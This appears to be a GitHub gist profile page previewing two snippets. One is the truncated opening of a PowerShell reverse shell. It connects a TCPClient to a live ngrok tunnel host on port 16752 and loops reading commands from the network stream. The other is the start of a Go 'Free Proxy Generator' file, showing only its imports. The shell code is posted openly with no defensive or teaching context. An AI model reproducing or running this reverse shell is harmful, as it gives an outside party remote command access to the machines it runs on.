Skip to content

Instantly share code, notes, and snippets.

View KnockOutEZ's full-sized avatar
🎯
Focusing

Towhid Khan KnockOutEZ

🎯
Focusing
View GitHub Profile
$LHOST='0.tcp.in.ngrok.io';
$LPORT=16752;
$TCPClient=New-Object Net.Sockets.TCPClient($LHOST,$LPORT);
$NetworkStream=$TCPClient.GetStream();
$StreamWriter=New-Object IO.StreamWriter($NetworkStream);
$StreamWriter.AutoFlush=$true;
$Buffer=New-Object System.Byte[] 1024;
while($TCPClient.Connected) {
while($NetworkStream.DataAvailable) {
$RawData=$NetworkStream.Read($Buffer,0,$Buffer.Length);
@KnockOutEZ
KnockOutEZ / proxy_gen.go
Last active September 25, 2024 05:56
Free Proxy Generator
package proxies
import (
"encoding/json"
"fmt"
"io"
"net/http"
"os"
)